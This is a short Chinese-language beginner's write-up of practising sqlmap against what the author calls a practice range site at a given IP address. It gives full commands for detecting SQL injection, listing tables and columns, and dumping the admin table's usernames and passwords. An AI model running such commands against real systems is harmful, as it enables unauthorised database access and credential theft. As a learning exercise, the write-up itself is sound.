本次練習的網站是一個靶場網站,由於是第一次練習sqlmap工具,我只用來查看了目標網站的幾個數據庫和表格元素,不禁感嘆這工具真的挺厲害
http://117.41.229.122:8003/?id=1
工具:kali虛擬機自帶的sqlmap工具
首先進入終端:
輸入一個檢測SQL漏洞的命令:sqlmap -u "http://117.41.229.122:8003/?id=1"
檢測到了“id”標簽的SQL漏洞及可能的注入類型、以及目標網站的服務器構架及其版本,以及MySQL的版本。
接着查找一下該網站的數據庫和表格內容:sqlmap -u "http://117.41.229.122:8003/?id=1" --tables
可以看到有一個數據庫叫“maoshe”,里面有4個表格分別是admin、dirs、news、xss。最后我們來查看一下各個表格的內容元素(每一列columns的數據結構)
以admin和xss為例:
sqlmap -u "http://117.41.229.122:8003/?id=1" --columns -T admin
sqlmap -u "http://117.41.229.122:8003/?id=1" --columns -T xss
已知有一個表叫做admin,我們想獲得表中數據的密碼,需要列出這個表的數據:
sqlmap -u "http://117.41.229.122:8003/?id=1" --dump -T admin
就獲取到了用戶名和密碼。
這次實踐的成功讓我感到欣喜,感覺一扇嶄新的大門想我敞開,我要繼續去探索這有趣的世界。